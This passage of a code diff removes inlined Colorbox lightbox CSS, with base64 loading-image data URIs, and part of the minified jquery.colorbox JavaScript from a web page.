WIhXa+1KfcJlIBsIDSmEzCatLt/CW96pGLNzu2LlbeBcbe+eNURhs6r2+cQGvuczhVh+tsMsK1qdX769DuLqYLQyHdc+lht4CqfDnMy0LZmScjI+/N7Y8llpNT4hYGABRVSYSIp1PCBmZygJRCn1pV87UHsKurnnAK3Tnebu6zCDOgydEKZwnlts/+srOBpY4hdbYOBtZACIWghHm7JyRCu3efEP6T4Vv0sK5wmQ8JLkAAAAASUVORK5CYII=);
-    }
-
-    #cboxTopLeft{width:14px; height:14px; background-repeat: no-repeat; background-position: 0 0;}
-    #cboxTopRight{width:14px; height:14px; background-repeat: no-repeat; background-position: -36px 0;}
-    #cboxBottomLeft{width:14px; height:43px; background-repeat: no-repeat; background-position: 0 -32px;}
-    #cboxBottomRight{width:14px; height:43px;  background-repeat: no-repeat; background-position: -36px -32px;}
-    #cboxMiddleLeft{width:14px; background-repeat: repeat-y; background-position: -175px 0;}
-    #cboxMiddleRight{width:14px; background-repeat: repeat-y; background-position: -211px 0;}
-    #cboxContent{background:#fff; overflow:visible;}
-
-
-
-        .cboxIframe{background:#fff;}
-        #cboxError{padding:50px; border:1px solid #ccc;}
-        #cboxLoadedContent{margin-bottom:5px;}
-        #cboxLoadingOverlay{background:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACgAAAAoBAMAAAB+0KVeAAAAElBMVEX///////////8AAAD///////9H1zSfAAAABXRSTlPvgBAAz5JLnNUAAAA+SURBVHhe7dMhAQAgEEPRIfAYEkCCi0ACEOtfBc8WAHFfPr0hGp/KwKS00BUPquIGTZ9gYqIdrZ23PYK9zAX6sAYavSqAMgAAAABJRU5ErkJggg==);
-         background-repeat: no-repeat; background-position: center center;}
-        #cboxLoadingGraphic{background: url(data:image/gif;base64,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);
-            background-repeat: no-repeat; background-position: center center;}
-</style><!-- END extlib/css/colorbox.css -->
-<!-- START extlib/js/jquery.colorbox.min.js -->
-<script type="text/javascript">(function(a,b,c){function Z(c,d,e){var g=b.createElement(c);return d&&(g.id=f+d),e&&(g.style.cssText=e),a(g)}function $(a){var b=y.length,c=(Q+a)%b;return 0>c?b+c:c}function _(a,b){return Math.round((/%/.test(a)?("x"===b?bb():cb())/100:1)*parseInt(a,10))}function ab(a){return K.photo||/\.(gif|png|jp(e|g|eg)|bmp|ico)((#|\?).*)?$/i.test(a)}function bb(){return c.innerWidth||z.width()}function cb(){return c.innerHeight||z.height()}function db(){var b,c=a.data(P,e);null==c?(K=a.extend({},d),console&&console.log&&console.log("Error: cboxElement missing settings object")):K=a.extend({},c);for(b in K)a.isFunction(K[b])&&"on"!==b.slice(0,2)&&(K[b]=K[b].call(P));K.rel=K.rel||P.rel||a(P).data("rel")||"nofollow",K.href=K.href||a(P).attr("href"),K.title=K.title||P.title,"string"==typeof K.href&&(K.href=a.trim(K.href))}function eb(b,c){a.event.trigger(b),c&&c.call(P)}function fb(){var a,d,e,b=f+"Slideshow_",c="click."+f;K.slideshow&&y[1]?(d=function(){F.text(K.slideshowStop).unbind(c).bind(j,function(){(K.loop||y[Q+1])&&(a=setTimeout(W.next,K.slideshowSpeed))}).bind(i,function(){clearTimeout(a)}).one(c+" "+k,e),r.removeClass(b+"off").addClass(b+"on"),a=setTimeout(W.next,K.slideshowSpeed)},e=function(){clearTimeout(a),F.text(K.slideshowStart).unbind([j,i,k,c].join(" ")).one(c,function(){W.next(),d()}),r.removeClass(b+"on").addClass(b+"off")},K.slideshowAuto?d():e()):r.removeClass(b+"off "+b+"on")}function gb(b){U||(P=b,db(),y=a(P),Q=0,"nofollow"!==K.rel&&(y=a("."+g).filter(function(){var c,b=a.data(this,e);return b&&(c=a(this).data("rel")||b.rel||this.rel),c===K.rel}),Q=y.index(P),-1===Q&&(y=y.add(P),Q=y.length-1)),S||(S=T=!0,r.show(),K.returnFocus&&a(P).blur().one(l,function(){a(this).focus()}),q.css({opacity:+K.opacity,cursor:K.overlayClose?"pointer":"auto"}).show(),K.w=_(K.initialWidth,"x"),K.h=_(K.initialHeight,"y"),W.position(),o&&z.bind("resize."+p+" scroll."+p,function(){q.css({width:bb(),height:cb(),top:z.scrollTop(),left:z.scrollLeft()})}).trigger("resize."+p),eb(h,K.onOpen),J.add(D).hide(),I.html(K.close).show()),W.load(!0))}function hb(){!r&&b.body&&(Y=!1,z=a(c),r=Z(X).attr({id:e,"class":n?f+(o?"IE6":"IE"):""}).hide(),q=Z(X,"Overlay",o?"position:absolute":"").hide(),C=Z(X,"LoadingOverlay").add(Z(X,"LoadingGraphic")),s=Z(X,"Wrapper"),t=Z(X,"Content").append(A=Z(X,"LoadedContent","width:0; height:0; overflow:hidden"),D=Z(X,"Title"),E=Z(X,"Current"),G=Z(X,"Next"),H=Z(X,"Previous"),F=Z(X,"Slideshow").bind(h,fb),I=Z(X,"Close")),s.append(Z(X).append(Z(X,"TopLeft"),u=Z(X,"TopCenter"),Z(X,"TopRight")),Z(X,!1,"clear:left").append(v=Z(X,"MiddleLeft"),t,w=Z(X,"MiddleRight")),Z(X,!1,"clear:left").append(Z(X,"BottomLeft"),x=Z(X,"BottomCenter"),Z(X,"BottomRight"))).find("div div").css({"float":"left"}),B=Z(X,!1,"position:absolute; width:9999px; visibility:hidden; display:none"),J=G.add(H).add(E).add(F),a(b.body).append(q,r.append(s,B)))}function ib(){return r?(Y||(Y=!0,L=u.height()+x.height()+t.outerHeight(!0)-t.height(),M=v.width()+w.width()+t.outerWidth(!0)-t.width(),N=A.outerHeight(!0),O=A.outerWidth(!0),r.css({"padding-bottom":L,"padding-right":M}),G.click(function(){W.next()}),H.click(function(){W.prev()}),I.click(function(){W.close()}),q.click(function(){K.overlayClose&&W.close()}),a(b).bind("keydown."+f,function(a){var b=a.keyCode;S&&K.escKey&&27===b&&(a.preventDefault(),W.close()),S&&K.arrowKey&&y[1]&&(37===b?(a.preventDefault(),H.click()):39===b&&(a.preventDefault(),G.click()))}),a("."+g,b).live("click",function(a){a.which>1||a.shiftKey||a.altKey||a.metaKey||(a.preventDefault(),gb(this))})),!0):!1}var 